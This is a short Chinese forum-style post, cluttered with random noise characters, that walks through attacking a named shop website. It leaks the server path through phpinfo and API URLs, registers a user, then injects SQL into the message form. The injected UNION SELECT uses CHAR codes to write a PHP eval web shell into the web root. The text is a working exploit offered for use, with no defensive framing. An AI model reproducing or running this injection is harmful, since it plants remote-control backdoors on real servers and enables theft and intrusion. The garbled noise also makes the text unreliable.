第一个:想办法找到目标网站的绝对路径
& T% ^' A; N2 q! J& @4 A! D6 a9 ^8 w
http://www.political-security.com/install/svinfo.php?phpinfo=true
4 C( [+ v" O+ e. H; Z( o; \4 H6 R6 J0 L6 l
http:/www.political-security.com/core/api/shop_api.php* @7 u" D- K4 z' C' ]0 }1 e9 a
' ?8 h6 }* t+ |9 P& \http://www.political-security.co ... api_b2b_2_0_cat.php: _ S L0 M) o* R$ q
# H+ N, Y3 e/ h: D7 J- ~http://www.political-security.com/core/ap ... b_2_0_goodstype.php
2 x9 h# O& p. ~8 h8 g! ?
/ U1 z! `* J; qhttp://www.political-security.co ... i_b2b_2_0_brand.php
6 q6 \' }- w) v+ ~8 b2 \第二个:注册一个普通用户
/ o+ B: N. K- O& [: L, j( r* K4 k- ?/ ~% N. |3 Z
http://www.political-security.com/?passport-signup.html, u, ]# P" a* [5 U
" y- k* H# _# {( [0 k0 e' j2 v" r
第三个: 发送消息
9 e0 O/ b) `0 S3 R* O6 j$ l# u: o! }: s) |; |
http://www.political-security.com/?member-send.html
. C2 N+ m4 ~! S5 X/ F发送给中填写% i$ o" d0 R3 ^
antian365.com' union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php' # |